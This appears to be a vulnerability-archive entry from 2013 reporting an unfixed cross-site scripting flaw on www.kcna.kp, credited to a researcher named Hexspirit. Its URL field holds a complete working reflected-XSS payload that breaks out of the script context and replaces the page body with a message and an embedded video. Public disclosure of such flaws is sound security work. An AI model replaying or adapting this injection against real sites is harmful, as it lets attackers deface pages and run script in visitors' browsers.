Security researcher Hexspirit, has submitted on 14/04/2013 a cross-site-scripting (XSS) vulnerability affecting www.kcna.kp, which at the time of submission ranked 113539 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 14/04/2013. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
Date submitted: 14/04/2013 |
Date published: 14/04/2013 |
Fixed? Mail us! | Status: UNFIXED |
Author: Hexspirit |
Domain: www.kcna.kp |
Category: XSS |
Pagerank: 113539 |
URL: http://www.kcna.kp/kcna.user.home.photo.retrievePhotoList.kcmsf?article_code=&article_type_list=&new s_type_code=&show_what=&mediaCode=\'")</script><script>document.body.innerHTML = "<h1>Please Stop The Nuclear War Threats | Hi From Greece!</h1><iframe/src=http://www.youtube.com/embed/VJNBfBr-OGU width=1600 height=800 allowfullscreen>";</script>;('&features_lang=1&exploit_lang=--C/script%3E%3b%28%27&features_lang=1&e xploit_lang=-- |
Click here to view the mirror
|
|
|